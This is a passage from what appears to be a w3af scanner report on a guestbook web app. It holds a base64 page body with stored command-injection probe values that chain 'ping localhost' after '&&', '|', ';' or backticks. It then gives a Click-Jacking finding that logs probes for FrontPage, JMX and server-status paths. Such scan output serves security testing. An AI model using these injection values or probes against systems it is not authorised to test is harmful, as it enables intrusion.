ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cGluZyAtYyA0IGxvY2FsaG9zdDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vdXNyL3Ni
aW4vcGluZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JiZwaW5nIC1jIDQg
bG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPiYmL3Vzci9zYmluL3BpbmcgLXMgbG9jYWxob3N0IDQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHBpbmcgLW4gNCBsb2Nh
bGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+fHBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fC91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaG9zdCA0
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PjtwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPjtwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjsvdXNyL3NiaW4vcGlu
ZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgo=
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[16, 37, 92, 94, 99, 122, 123, 164, 203, 204, 205, 206, 207, 209, 211, 212, 213, 214, 215, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 229, 231, 232, 233, 235, 236, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 254, 258, 259, 260, 261, 263, 264, 266, 268, 270, 271, 272, 273, 274, 276, 277, 278, 280, 283, 285, 295, 307, 308, 310, 314, 315, 316, 318, 320, 321, 323, 326, 327, 328, 329, 330, 332, 333, 335, 336, 337, 338, 339, 340, 341, 343, 344, 345, 346, 348, 351, 354, 355, 356, 357, 359, 360, 361, 362, 364, 366, 367, 368, 370, 373, 375, 377, 378, 379, 396, 410, 413, 426, 432, 436, 451, 455, 464, 491, 519, 522, 524, 525, 534, 535, 536, 538, 539, 540, 541, 542, 547, 549, 604, 622, 696, 704, 761, 785, 794, 800, 805, 811, 830, 848, 849, 854, 860, 861, 862, 864, 892, 893, 914, 921, 936, 939, 952, 955, 968, 969, 984, 986, 1000, 1002, 1015, 1029]" method="GET" name="Click-Jacking vulnerability" plugin="click_jacking" severity="Medium" url="None" var="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks.</description>
        <http-transactions>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="37">
                <httprequest>
                    <status>PUT http://10.12.68.43:31337/QRMgi HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">qUjszU</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="92">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="94">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="99">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/TwgVH.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/TwgVH.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="122">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="123">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L1R3Z1ZILmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguSFZnd1Q=
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="164">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="203">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="204">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="205">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="206">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="207">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="209">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
